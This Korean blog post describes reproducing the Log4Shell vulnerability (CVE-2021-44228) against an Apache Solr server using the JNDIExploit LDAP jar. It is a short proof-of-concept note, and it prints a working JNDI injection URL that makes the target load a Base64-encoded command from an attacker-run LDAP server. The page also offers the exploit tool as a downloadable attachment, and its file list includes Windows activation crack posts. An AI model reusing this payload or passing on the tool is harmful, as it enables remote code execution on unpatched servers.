메뉴 건너뛰기

pds

log4j 취약점 POC 를 위한 LDAP jar

suritam92022.09.16 10:57조회 수 43댓글 0

  • 1
    • 글자 크기

log4j 취약점 설명이 잘 되어 있는 페이지가 있다.

 

 

https://www.kisec.com/rsrh_rpt_det.do?id=783

 

CVE-2021-44228 을 재현하기 위해 해당 페이지를 참고 했다.

 

Attacker와 Butt(victim)만 있으면 재현 가능한 취약점에 비해 Communicator 까지 필요한 POC라서 이해하는데 시간이 많이 소요된다.

 

JNDIExploit-1.2-SNAPSHOT.jar 를 배포하던 저장소의 계정이 삭제되어 해당 파일을 입수하는데 시간이 걸렸다.

 

해당 JAR만 잘 실행하면 ldap을 통해 공격 코드를 전송할 수 있다.

 

한 가지 더 주의할 점은 base64 encoding 으로 보내고 decoding 시켜주는 경로를 사용해야 한다는 점이다.

 

웹 브라우저로도 테스트 가능하며 ldap은 같은 경로에서 java로 실행하여 성공하였다.

 

 

http://취약환경이있는서버:8983/solr/admin/cores?action=${jndi:ldap://ldap을실행한서버:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9jd2UtMjAyMS00NDIyOA==}

 

touch /tmp/cwe-2021-44228 는 base64 encoding한 코드이다.

 

  • 1
    • 글자 크기

댓글 달기

번호 제목 글쓴이 날짜 조회 수
112 [CD] nrg -> iso 박영식 2009.07.31 9992
111 삼성 노트북 sens s820/s850 윈도우98 디스플레이 사운드 드라이버1 박영식 2009.08.03 9736
110 삼성 노트북 sens s820/s850 윈도우98 디스플레이 사운드 드라이버2 박영식 2009.08.03 9790
109 삼성 노트북 sens s820/s850 윈도우98 디스플레이 사운드 드라이버3 박영식 2009.08.03 10510
108 wma_mp3_converter(wma->mp3) 박영식 2009.08.03 12232
107 [OS] 윈도우 xp 설치를 위한 USB 부트용 프로그램 박영식 2009.08.08 9485
106 [문서] 생명보험 보험료 차등 혜택 박영식 2009.08.12 9108
105 [논문] 웹표준 준수와 다중 플랫폼 지원을 통한 웹사이트 관리 박영식 2009.08.12 10002
104 [메일서버] hMailServer-5.1.2-B346.exe 박영식 2009.08.23 12575
103 [크랙] Windows 7 professional k 인증 크랙 박영식 2009.09.06 22741
102 [크랙] Windows 7 professional k 인증 크랙(2) 박영식 2009.09.06 19485
101 [문서] 친일인명사전 명단 박영식 2009.11.14 8644
100 [서식] APA, MLA 포맷(기본형) 박영식 2009.11.14 13588
99 [자바] java decompiler (자바 디컴파일러) 박영식 2009.11.17 10214
98 [XE] 통계용 모듈과 플러그인 박영식 2010.01.12 9585
97 testdisk 파티션복구 프로그램 박영식 2010.01.21 9974
96 [기출문제] 정보처리기사 2005-4 ~2007~4 박영식 2010.04.02 9586
95 [폰트] 휴먼명조 유사체 박영식 2010.04.08 15444
94 [논문] 모바일 웹에서 제조사 및 원격 제어 앱 입력 식별에 관한 실증적 연구 suritam9 2020.10.19 86
93 정보처리기사 실기기출문제(2005-4~2009-2) 박영식 2010.05.19 12220
첨부 (1)
JNDIExploit.v1.2.zip
34.26MB / Download 24
위로